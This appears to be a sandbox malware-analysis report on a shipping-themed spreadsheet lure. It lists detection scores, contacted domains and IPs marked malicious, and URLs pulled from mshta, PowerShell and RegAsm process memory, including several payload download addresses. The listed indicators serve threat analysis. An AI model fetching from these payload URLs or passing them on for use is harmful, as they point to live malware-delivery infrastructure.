                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    Maersk BL, IN & PL.xls8%ReversingLabsDocument-PDF.Trojan.Heuristic
                    Maersk BL, IN & PL.xls100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://www.imvu.comr0%URL Reputationsafe
                    http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                    https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                    http://geoplugin.net/json.gp/C0%URL Reputationsafe
                    https://nuget.org/nuget.exe0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://www.imvu.com0%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                    http://ocsp.entrust.net030%URL Reputationsafe
                    https://contoso.com/License0%URL Reputationsafe
                    http://go.micros0%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe
                    https://login.yahoo.com/config/login0%URL Reputationsafe
                    http://ocsp.entrust.net0D0%URL Reputationsafe
                    http://nuget.org/NuGet.exe0%URL Reputationsafe
                    http://crl.entrust.net/server1.crl00%URL Reputationsafe
                    http://geoplugin.net/json.gp0%URL Reputationsafe
                    https://secure.comodo.com/CPS00%URL Reputationsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ugnrv.duckdns.org
                    192.3.101.184
                    truetrue
                      unknown
                      ia600102.us.archive.org
                      207.241.227.242
                      truetrue
                        unknown
                        wrath.me
                        188.114.96.3
                        truefalse
                          unknown
                          geoplugin.net
                          178.237.33.50
                          truefalse
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            http://38.240.44.9/590/RRSRRD.txttrue
                              unknown
                              ugnrv.duckdns.orgtrue
                                unknown
                                https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpgtrue
                                  unknown
                                  http://38.240.44.9/590/nicefeaturesworkinggreat.Tiftrue
                                    unknown
                                    http://38.240.44.9/590/un/verynicepersonupdation.htatrue
                                      unknown
                                      https://wrath.me/DeSHzcfalse
                                        unknown
                                        http://geoplugin.net/json.gpfalse
                                        • URL Reputation: safe
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://www.imvu.comrRegAsm.exe, 0000001D.00000002.508964353.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_bhvCD3E.tmp.26.drfalse
                                          unknown
                                          https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1bhvCD3E.tmp.26.drfalse
                                            unknown
                                            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.481362851.000000001C25C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C180000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C165000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.00000000035FC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.481362851.000000001C25C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C180000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C1B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C165000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C182000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9bhvCD3E.tmp.26.drfalse
                                                unknown
                                                https://deff.nelreports.net/api/report?cat=msnbhvCD3E.tmp.26.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.imvu.com/PKRegAsm.exe, 0000001D.00000002.508846937.000000000036C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://cache.btrll.com/default/Pix-1x1.gifbhvCD3E.tmp.26.drfalse
                                                    unknown
                                                    https://www.google.comRegAsm.exe, RegAsm.exe, 0000001D.00000002.508964353.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      unknown
                                                      http://38.240.44.9/590/un/verynicepersonupdation.htagmshta.exe, 00000004.00000003.448430988.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447903392.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.000000000364E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://38.240.44.9/590/un/verynicepersonupdation.htabmshta.exe, 00000004.00000003.448430988.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447903392.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.000000000364E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://geoplugin.net/json.gp/Cpowershell.exe, 0000000E.00000002.497783599.000000001291E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.526775869.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://o.aolcdn.com/ads/adswrappermsni.jsbhvCD3E.tmp.26.drfalse
                                                            unknown
                                                            http://www.msn.com/?ocid=iehpbhvCD3E.tmp.26.drfalse
                                                              unknown
                                                              https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.479386384.0000000012421000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://static.chartbeat.com/js/chartbeat.jsbhvCD3E.tmp.26.drfalse
                                                                unknown
                                                                http://www.msn.com/de-de/?ocid=iehpbhvCD3E.tmp.26.drfalse
                                                                  unknown
                                                                  http://38.240.44.9/590/un/verynicepersonupdation.htawmshta.exe, 0000000F.00000002.493427429.0000000000250000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492748708.000000000024F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://www.nirsoft.net/RegAsm.exe, 0000001D.00000002.508964353.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.470636519.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.540782359.000000000230B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.494455760.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.502469699.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.555400869.0000000002372000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.528837930.0000000002571000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpgXpowershell.exe, 0000000E.00000002.494455760.00000000025A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.528837930.0000000002772000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://38.240.44.9/590/un/verynicepersonupdation.htazmshta.exe, 0000000F.00000002.493427429.0000000000250000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492748708.000000000024F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://go.crpowershell.exe, 00000013.00000002.516210163.000000001C318000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683bhvCD3E.tmp.26.drfalse
                                                                              unknown
                                                                              http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(bhvCD3E.tmp.26.drfalse
                                                                                unknown
                                                                                https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9bhvCD3E.tmp.26.drfalse
                                                                                  unknown
                                                                                  http://38.240.44.9/590/un/verynicepersonupdation.htaFmshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_shbhvCD3E.tmp.26.drfalse
                                                                                      unknown
                                                                                      http://38.240.44.9/amshta.exe, 00000004.00000003.448430988.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447903392.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.000000000364E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://38.240.44.9/590/un/verynicepersonupdation.htaJmshta.exe, 00000004.00000002.448553734.000000000039A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://www.imvu.comRegAsm.exe, RegAsm.exe, 0000001D.00000002.508964353.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.509507679.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://contoso.com/Iconpowershell.exe, 00000007.00000002.479386384.0000000012421000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          http://38.240.44.9powershell.exe, 0000000E.00000002.494455760.0000000002788000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.528837930.0000000002C36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://wrath.me/DeSHzcBUmshta.exe, 0000000F.00000002.493401443.000000000022A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://38.240.44.9/590/un/verynicepersonupdation.htaQmshta.exe, 0000000F.00000002.493635513.0000000003794000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://contextual.media.net/bhvCD3E.tmp.26.drfalse
                                                                                                  unknown
                                                                                                  http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.jsbhvCD3E.tmp.26.drfalse
                                                                                                    unknown
                                                                                                    https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2bhvCD3E.tmp.26.drfalse
                                                                                                      unknown
                                                                                                      https://ia600102.us.archive.orgpowershell.exe, 0000000E.00000002.494455760.00000000025A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.528837930.0000000002772000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        http://www.msn.com/bhvCD3E.tmp.26.drfalse
                                                                                                          unknown
                                                                                                          https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549bhvCD3E.tmp.26.drfalse
                                                                                                            unknown
                                                                                                            https://wrath.me/DeSHzcon.htaJmshta.exe, 00000004.00000002.448719832.0000000003670000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448403328.0000000003670000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003670000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447903392.0000000003670000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              http://go.microsoft.cpowershell.exe, 0000000E.00000002.530346179.000000001AB9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://wrath.me/YZmshta.exe, 0000000F.00000002.493635513.0000000003770000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://www.google.com/accounts/serviceloginRegAsm.exefalse
                                                                                                                    unknown
                                                                                                                    http://38.240.44.9/590/un/verynicepersonupdation.hta4mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2FsetbhvCD3E.tmp.26.drfalse
                                                                                                                        unknown
                                                                                                                        https://policies.yahoo.com/w3c/p3p.xmlbhvCD3E.tmp.26.drfalse
                                                                                                                          unknown
                                                                                                                          http://38.240.44.9/590/un/verynicepersonupdation.hta?mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.481362851.000000001C25C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C180000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C165000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            http://www.msn.com/advertisement.ad.jsbhvCD3E.tmp.26.drfalse
                                                                                                                              unknown
                                                                                                                              http://38.240.44.9/590/nicefeaturesworkinggreat.TifIpowershell.exe, 00000013.00000002.514899647.000000001A5DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                http://b.scorecardresearch.com/beacon.jsbhvCD3E.tmp.26.drfalse
                                                                                                                                  unknown
                                                                                                                                  https://wrath.me/Fmshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://acdn.adnxs.com/ast/ast.jsbhvCD3E.tmp.26.drfalse
                                                                                                                                      unknown
                                                                                                                                      http://38.240.44.9/#mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://ocsp.entrust.net03mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.481362851.000000001C25C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C180000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C1CC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C1B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C165000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C182000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://contoso.com/Licensepowershell.exe, 00000007.00000002.479386384.0000000012421000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://38.240.44.9/590/nicefeatupowershell.exe, 00000007.00000002.470636519.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.502469699.00000000024F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.pngbhvCD3E.tmp.26.drfalse
                                                                                                                                            unknown
                                                                                                                                            http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.htmlbhvCD3E.tmp.26.drfalse
                                                                                                                                              unknown
                                                                                                                                              https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsbhvCD3E.tmp.26.drfalse
                                                                                                                                                unknown
                                                                                                                                                http://38.240.44.9/590/nicefeaturesworkinggreat.Tifppowershell.exe, 00000007.00000002.470636519.0000000002ADF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.502469699.00000000024F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  http://go.microspowershell.exe, 00000007.00000002.470636519.0000000002ADF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comRegAsm.exe, 0000001D.00000002.508964353.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683bhvCD3E.tmp.26.drfalse
                                                                                                                                                      unknown
                                                                                                                                                      http://38.240.44.9/mshta.exe, 00000004.00000003.448430988.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447903392.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.000000000364E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://wrath.me/mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447936194.000000000040F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448574123.000000000040F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhvCD3E.tmp.26.drfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://contoso.com/powershell.exe, 00000007.00000002.479386384.0000000012421000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhvCD3E.tmp.26.drfalse
                                                                                                                                                              unknown
                                                                                                                                                              http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhvCD3E.tmp.26.drfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://login.yahoo.com/config/loginRegAsm.exefalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                unknown
                                                                                                                                                                http://ocsp.entrust.net0Dmshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.481362851.000000001C25C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C180000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C165000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhvCD3E.tmp.26.drfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  http://38.240.44.9/590/un/verynicepersonupdation.htahttp://38.240.44.9/590/un/verynicepersonupdationmshta.exe, 00000004.00000003.448326781.0000000003005000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487911172.0000000002C85000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.490123210.0000000002C85000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhvCD3E.tmp.26.drfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.479386384.0000000012421000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                      unknown
                                                                                                                                                                      https://www.ccleaner.com/go/app_cc_pro_trialkeybhvCD3E.tmp.26.drfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://wrath.me/DeSHzcon.htaVUmshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://wrath.me/lZmshta.exe, 0000000F.00000002.493635513.0000000003770000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000003.447903392.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448719832.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.447503309.0000000003626000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.448430988.0000000003626000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.481362851.000000001C25C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C180000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.531621605.000000001C1B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487893525.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.492819928.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.493645018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C165000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.549170041.000000001C182000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            https://contextual.media.net/8/nrrV73987.jsbhvCD3E.tmp.26.drfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              http://crl.entrust.npowershell.exe, 0000000E.00000002.531621605.000000001C1CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://wrath.me/DeSHzcFUmshta.exe, 0000000F.00000002.493401443.000000000022A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhvCD3E.tmp.26.drfalse
                                                                                                                                                                                    unknown
